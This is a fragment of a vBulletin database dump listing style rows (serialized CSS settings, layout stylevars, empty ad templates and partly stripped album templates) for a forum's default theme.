(1161, -1, '.alt1, .alt1Active', 'a:7:{s:10:\"background\";s:7:\"#F5F5FF\";s:5:\"color\";s:7:\"#000000\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:0:\"\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1073834577, 'vBulletin Solutions', '', 'vbulletin'),
(1162, -1, '.alt2, .alt2Active', 'a:7:{s:10:\"background\";s:7:\"#E1E4F2\";s:5:\"color\";s:7:\"#000000\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:0:\"\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1073834577, 'vBulletin Solutions', '', 'vbulletin'),
(1163, -1, '.alt3', 'a:7:{s:10:\"background\";s:7:\"#D5D8E5\";s:5:\"color\";s:7:\"#000000\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:0:\"\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1067012043, 'vBulletin Solutions', '', 'vbulletin'),
(1164, -1, '.button', 'a:4:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:4:\"11px\";s:6:\"family\";s:70:\"verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:0:\"\";}', '', 'css', 1120222838, 'vBulletin Solutions', '', 'vbulletin'),
(1165, -1, '.fjdpth0', 'a:2:{s:10:\"background\";s:7:\"#F7F7F7\";s:5:\"color\";s:7:\"#000000\";}', '', 'css', 1046352028, 'vBulletin Solutions', '', 'vbulletin'),
(1166, -1, '.fjdpth1', 'a:2:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";}', '', 'css', 1056448705, 'vBulletin Solutions', '', 'vbulletin'),
(1167, -1, '.fjdpth2', 'a:2:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";}', '', 'css', 1056448705, 'vBulletin Solutions', '', 'vbulletin'),
(1168, -1, '.fjdpth3', 'a:2:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";}', '', 'css', 1056448705, 'vBulletin Solutions', '', 'vbulletin'),
(1169, -1, '.fjdpth4', 'a:2:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";}', '', 'css', 1056448705, 'vBulletin Solutions', '', 'vbulletin'),
(1170, -1, '.fjsel', 'a:2:{s:10:\"background\";s:7:\"#3E5C92\";s:5:\"color\";s:7:\"#E0E0F6\";}', '', 'css', 1067012043, 'vBulletin Solutions', '', 'vbulletin'),
(1171, -1, '.highlight', 'a:4:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#FF0000\";s:4:\"font\";a:3:{s:5:\"style\";s:4:\"bold\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:0:\"\";}', '', 'css', 1040219143, 'vBulletin Solutions', '', 'vbulletin'),
(1172, -1, '.inlinemod', 'a:7:{s:10:\"background\";s:7:\"#FFFFCC\";s:5:\"color\";s:7:\"#000000\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:0:\"\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1115900604, 'vBulletin Solutions', '', 'vbulletin'),
(1173, -1, '.navbar', 'a:7:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:4:\"11px\";s:6:\"family\";s:70:\"verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:0:\"\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1070538485, 'vBulletin Solutions', '', 'vbulletin'),
(1174, -1, '.page', 'a:7:{s:10:\"background\";s:7:\"#FFFFFF\";s:5:\"color\";s:7:\"#000000\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:0:\"\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1070559938, 'vBulletin Solutions', '', 'vbulletin'),
(1175, -1, '.panel', 'a:7:{s:10:\"background\";s:66:\"#E4E7F5 url(images/gradients/gradient_panel.gif) repeat-x top left\";s:5:\"color\";s:7:\"#000000\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:35:\"padding: 10px;\r\nborder: 2px outset;\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1072807017, 'vBulletin Solutions', '', 'vbulletin'),
(1176, -1, '.panelsurround', 'a:4:{s:10:\"background\";s:74:\"#D1D4E0 url(images/gradients/gradient_panelsurround.gif) repeat-x top left\";s:5:\"color\";s:7:\"#000000\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:0:\"\";}', '', 'css', 1140435494, 'vBulletin Solutions', '', 'vbulletin'),
(1177, -1, '.smallfont', 'a:4:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:4:\"11px\";s:6:\"family\";s:70:\"verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:0:\"\";}', '', 'css', 1068308027, 'vBulletin Solutions', '', 'vbulletin'),
(1178, -1, '.tborder', 'a:4:{s:10:\"background\";s:7:\"#D1D1E1\";s:5:\"color\";s:7:\"#000000\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:26:\"border: 1px solid #0B198C;\";}', '', 'css', 1070544442, 'vBulletin Solutions', '', 'vbulletin'),
(1179, -1, '.tcat', 'a:7:{s:10:\"background\";s:65:\"#869BBF url(images/gradients/gradient_tcat.gif) repeat-x top left\";s:5:\"color\";s:7:\"#FFFFFF\";s:4:\"font\";a:3:{s:5:\"style\";s:4:\"bold\";s:4:\"size\";s:4:\"10pt\";s:6:\"family\";s:70:\"verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:0:\"\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#ffffff\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#ffffff\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#FFFF66\";s:15:\"text-decoration\";s:9:\"underline\";}}', '', 'css', 1070559254, 'vBulletin Solutions', '', 'vbulletin'),
(1180, -1, '.tfoot', 'a:7:{s:10:\"background\";s:7:\"#3E5C92\";s:5:\"color\";s:7:\"#E0E0F6\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:0:\"\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#E0E0F6\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#E0E0F6\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#FFFF66\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1067012043, 'vBulletin Solutions', '', 'vbulletin'),
(1181, -1, '.thead', 'a:7:{s:10:\"background\";s:66:\"#5C7099 url(images/gradients/gradient_thead.gif) repeat-x top left\";s:5:\"color\";s:7:\"#FFFFFF\";s:4:\"font\";a:3:{s:5:\"style\";s:4:\"bold\";s:4:\"size\";s:4:\"11px\";s:6:\"family\";s:78:\"tahoma, verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:0:\"\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#FFFFFF\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#FFFFFF\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#FFFF00\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1070559254, 'vBulletin Solutions', '', 'vbulletin'),
(1182, -1, '.time', 'a:4:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#666686\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:0:\"\";}', '', 'css', 1046292948, 'vBulletin Solutions', '', 'vbulletin'),
(1183, -1, '.vbmenu_control', 'a:7:{s:10:\"background\";s:7:\"#738FBF\";s:5:\"color\";s:7:\"#FFFFFF\";s:4:\"font\";a:3:{s:5:\"style\";s:4:\"bold\";s:4:\"size\";s:4:\"11px\";s:6:\"family\";s:78:\"tahoma, verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:47:\"padding: 3px 6px 3px 6px;\r\nwhite-space: nowrap;\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#FFFFFF\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#FFFFFF\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#FFFFFF\";s:15:\"text-decoration\";s:9:\"underline\";}}', '', 'css', 1070536142, 'vBulletin Solutions', '', 'vbulletin'),
(1184, -1, '.vbmenu_hilite', 'a:7:{s:10:\"background\";s:7:\"#8A949E\";s:5:\"color\";s:7:\"#FFFFFF\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:4:\"11px\";s:6:\"family\";s:70:\"verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:38:\"white-space: nowrap;\r\ncursor: pointer;\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#FFFFFF\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#FFFFFF\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#FFFFFF\";s:15:\"text-decoration\";s:4:\"none\";}}', '', 'css', 1072807017, 'vBulletin Solutions', '', 'vbulletin'),
(1185, -1, '.vbmenu_option', 'a:7:{s:10:\"background\";s:7:\"#BBC7CE\";s:5:\"color\";s:7:\"#000000\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:4:\"11px\";s:6:\"family\";s:70:\"verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:38:\"white-space: nowrap;\r\ncursor: pointer;\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#22229C\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#22229C\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#FFFFFF\";s:15:\"text-decoration\";s:4:\"none\";}}', '', 'css', 1072807017, 'vBulletin Solutions', '', 'vbulletin'),
(1186, -1, '.vbmenu_popup', 'a:4:{s:10:\"background\";s:7:\"#FFFFFF\";s:5:\"color\";s:7:\"#000000\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:26:\"border: 1px solid #0B198C;\";}', '', 'css', 1073671310, 'vBulletin Solutions', '', 'vbulletin'),
(1187, -1, '.wysiwyg', 'a:7:{s:10:\"background\";s:7:\"#F5F5FF\";s:5:\"color\";s:7:\"#000000\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:4:\"10pt\";s:6:\"family\";s:70:\"verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:42:\"margin: 5px 10px 10px 10px;\r\npadding: 0px;\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#22229C\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#22229C\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#FF4400\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1205431348, 'vBulletin Solutions', '', 'vbulletin'),
(1188, -1, 'body', 'a:7:{s:10:\"background\";s:7:\"#E1E1E2\";s:5:\"color\";s:7:\"#000000\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:4:\"10pt\";s:6:\"family\";s:70:\"verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:42:\"margin: 5px 10px 10px 10px;\r\npadding: 0px;\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#22229C\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#22229C\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#FF4400\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1221823016, 'vBulletin Solutions', '', 'vbulletin'),
(1189, -1, 'EXTRA', 'a:1:{s:3:\"all\";s:781:\"/* ***** styling for \'big\' usernames on postbit etc. ***** */\r\n.bigusername { font-size: 14pt; }\r\n\r\n/* ***** small padding on \'thead\' elements ***** */\r\ntd.thead, th.thead, div.thead { padding: 4px; }\r\n\r\n/* ***** basic styles for multi-page nav elements */\r\n.pagenav a { text-decoration: none; }\r\n.pagenav td { padding: 2px 4px 2px 4px; }\r\n\r\n/* ***** de-emphasized text */\r\n.shade, a.shade:link, a.shade:visited { color: #777777; text-decoration: none; }\r\na.shade:active, a.shade:hover { color: #FF4400; text-decoration: underline; }\r\n.tcat .shade, .thead .shade, .tfoot .shade { color: #DDDDDD; }\r\n\r\n/* ***** define margin and font-size for elements inside panels ***** */\r\n.fieldset { margin-bottom: 6px; }\r\n.fieldset, .fieldset td, .fieldset p, .fieldset li { font-size: 11px; }\";}', '', 'css', 1203423795, 'vBulletin Solutions', '', 'vbulletin'),
(1190, -1, 'EXTRA2', 'a:1:{s:3:\"all\";s:0:\"\";}', '', 'css', 1078840372, 'vBulletin Solutions', '', 'vbulletin'),
(1191, -1, 'legend', 'a:4:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#22229C\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:4:\"11px\";s:6:\"family\";s:78:\"tahoma, verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:0:\"\";}', '', 'css', 1070561805, 'vBulletin Solutions', '', 'vbulletin'),
(1192, -1, 'select', 'a:4:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:4:\"11px\";s:6:\"family\";s:70:\"verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:0:\"\";}', '', 'css', 1067012043, 'vBulletin Solutions', '', 'vbulletin'),
(1193, -1, 'td, th, p, li', 'a:4:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:4:\"10pt\";s:6:\"family\";s:70:\"verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:0:\"\";}', '', 'css', 1056442382, 'vBulletin Solutions', '', 'vbulletin'),
(1194, -1, 'textarea, .bginput', 'a:4:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:4:\"10pt\";s:6:\"family\";s:70:\"verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:0:\"\";}', '', 'css', 1070085786, 'vBulletin Solutions', '', 'vbulletin'),
(1195, -1, 'cellpadding', '6', '', 'stylevar', 1068579842, 'vBulletin Solutions', '', 'vbulletin'),
(1196, -1, 'cellspacing', '1', '', 'stylevar', 1040219143, 'vBulletin Solutions', '', 'vbulletin'),
(1197, -1, 'codeblockwidth', '640px', '', 'stylevar', 1125950157, 'vBulletin Solutions', '', 'vbulletin'),
(1198, -1, 'formspacer', '3', '', 'stylevar', 1069970481, 'vBulletin Solutions', '', 'vbulletin'),
(1199, -1, 'formwidth', '640px', '', 'stylevar', 1069991765, 'vBulletin Solutions', '', 'vbulletin'),
(1200, -1, 'formwidth_usercp', '480px', '', 'stylevar', 1069991935, 'vBulletin Solutions', '', 'vbulletin'),
(1201, -1, 'htmldoctype', '', '', 'stylevar', 1068305694, 'vBulletin Solutions', '', 'vbulletin'),
(1202, -1, 'htmlextrasfolder', 'htmlextras', '', 'stylevar', 1040219143, 'vBulletin Solutions', '', 'vbulletin'),
(1203, -1, 'imagesfolder', 'images', '', 'stylevar', 1040219143, 'vBulletin Solutions', '', 'vbulletin'),
(1204, -1, 'imgdir_attach', 'images/attach', '', 'stylevar', 1063625684, 'vBulletin Solutions', '', 'vbulletin'),
(1205, -1, 'imgdir_button', 'images/buttons', '', 'stylevar', 1070558808, 'vBulletin Solutions', '', 'vbulletin'),
(1206, -1, 'imgdir_editor', 'images/editor', '', 'stylevar', 1063625684, 'vBulletin Solutions', '', 'vbulletin'),
(1207, -1, 'imgdir_misc', 'images/misc', '', 'stylevar', 1063625684, 'vBulletin Solutions', '', 'vbulletin'),
(1208, -1, 'imgdir_poll', 'images/polls', '', 'stylevar', 1063625684, 'vBulletin Solutions', '', 'vbulletin'),
(1209, -1, 'imgdir_rating', 'images/rating', '', 'stylevar', 1063626028, 'vBulletin Solutions', '', 'vbulletin'),
(1210, -1, 'imgdir_reputation', 'images/reputation', '', 'stylevar', 1063625684, 'vBulletin Solutions', '', 'vbulletin'),
(1211, -1, 'imgdir_statusicon', 'images/statusicon', '', 'stylevar', 1063625684, 'vBulletin Solutions', '', 'vbulletin'),
(1212, -1, 'messagewidth', '540px', '', 'stylevar', 1149005314, 'vBulletin Solutions', '', 'vbulletin'),
(1213, -1, 'messagewidth_usercp', '380px', '', 'stylevar', 1149091687, 'vBulletin Solutions', '', 'vbulletin'),
(1214, -1, 'outerborderwidth', '20', '', 'stylevar', 1103662055, 'vBulletin Solutions', '', 'vbulletin'),
(1215, -1, 'outertablewidth', '100%', '', 'stylevar', 1078470862, 'vBulletin Solutions', '', 'vbulletin'),
(1216, -1, 'spacersize', '25', '', 'stylevar', 1067012043, 'vBulletin Solutions', '', 'vbulletin'),
(1217, -1, 'tablewidth', '100%', '', 'stylevar', 1040219143, 'vBulletin Solutions', '', 'vbulletin'),
(1218, -1, 'textareacols_ie4', '70', '', 'stylevar', 1040219143, 'vBulletin Solutions', '', 'vbulletin'),
(1219, -1, 'textareacols_ns4', '50', '', 'stylevar', 1040219143, 'vBulletin Solutions', '', 'vbulletin'),
(1220, -1, 'textareacols_ns6', '65', '', 'stylevar', 1040392844, 'vBulletin Solutions', '', 'vbulletin'),
(1221, -1, 'titleimage', 'images/misc/vbulletin3_logo_white.gif', '', 'stylevar', 1070560108, 'vBulletin Solutions', '', 'vbulletin'),
(1222, -1, 'ad_footer_end', '', '', 'template', 1192725135, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1223, -1, 'ad_footer_start', '', '', 'template', 1192725144, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1224, -1, 'ad_forumdisplay_afterthreads', '', '', 'template', 1192725148, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1225, -1, 'ad_forumhome_afterforums', '', '', 'template', 1192725152, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1226, -1, 'ad_header_end', '', '', 'template', 1192725156, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1227, -1, 'ad_header_logo', '', '', 'template', 1192725159, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1228, -1, 'ad_navbar_below', '', '', 'template', 1192725162, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1229, -1, 'ad_showthread_beforeqr', '', '', 'template', 1192725165, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1230, -1, 'ad_showthread_firstpost', '', '', 'template', 1192725170, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1231, -1, 'ad_showthread_firstpost_sig', '', '', 'template', 1219837267, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1232, -1, 'ad_showthread_firstpost_start', '', '', 'template', 1219837260, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1233, -1, 'albumbit', '\r\n $template_hook[albumbit_start]\r\n \r\n \".(($album[\'coverthumburl\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"albumid=$album[albumid]\\\"> \r\n \") : (\"\r\n \r\n \")).\"\r\n \r\n \r\n \".(($show[\'moderated\']) ? (\" \") : (\"\")).\"\r\n session->vars[\'sessionurl\'] . \"albumid=$album[albumid]\\\">$album[title_html] \r\n \r\n $album[description_html]\r\n \".(($show[\'personalalbum\']) ? (\"$albumtype \") : (\"\")).\"\r\n
\r\n \r\n $album[picturecount] \r\n \r\n \".(($album[\'lastpicturedate\']) ? (\"\r\n $album[picturedate] \".((!$show[\'detailedtime\']) ? (\"$album[picturetime] \") : (\"\")).\"\r\n \") : (\"\r\n $vbphrase[none]\r\n \")).\"\r\n \r\n $template_hook[albumbit_end]\r\n ', '\r\n $template_hook[albumbit_start]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[x_moderated_pictures]\" style=\"float:$stylevar[right]\" /> \r\n $album[title_html] \r\n \r\n $album[description_html]\r\n $albumtype \r\n
\r\n \r\n $album[picturecount] \r\n \r\n \r\n $album[picturedate] $album[picturetime] \r\n \r\n $vbphrase[none]\r\n \r\n \r\n $template_hook[albumbit_end]\r\n ', 'template', 1218627606, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1234, -1, 'album_addgroup', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$usercss\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - \" . construct_phrase(\"$vbphrase[xs_album_y]\", \"$userinfo[username]\", \"$albuminfo[title_html]\") . \" - $vbphrase[add_picture_to_groups] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$usercss\r\n$vboptions[bbtitle] - $vbphrase[xs_album_y] - $vbphrase[add_picture_to_groups] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n$footer\r\n\r\n', 'template', 1208875378, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1235, -1, 'album_addgroup_groupbit', '\r\n \r\n \r\n \r\n \r\n \r\n $group[name] \r\n \".(($group[\'shortdescription\']) ? (\"$group[shortdescription]
\") : (\"\")).\"\r\n \r\n ', '\r\n \r\n \r\n \r\n \r\n \r\n $group[name] \r\n $group[shortdescription]
\r\n \r\n ', 'template', 1195485096, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1236, -1, 'album_edit', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$usercss\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - \".(($albuminfo[\'albumid\']) ? (\"$vbphrase[edit_album]\") : (\"$vbphrase[add_album]\")).\" \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\".(($show[\'delete_option\']) ? (\"\r\n
\r\n\r\n
\r\n\") : (\"\")).\"\r\n\r\n$errortable\r\n\r\n
\r\n\r\n
\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$usercss\r\n$vboptions[bbtitle] - $vbphrase[edit_album] $vbphrase[add_album] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n$footer\r\n\r\n', 'template', 1208875679, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1237, -1, 'album_latestbit', '\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n \r\n \r\n
', '\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[picture] \r\n \r\n $vbphrase[picture_moderated] \r\n \r\n \r\n
\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n \r\n \r\n
', 'template', 1233923352, 'vBulletin Solutions', '3.8.2', 'vbulletin'),
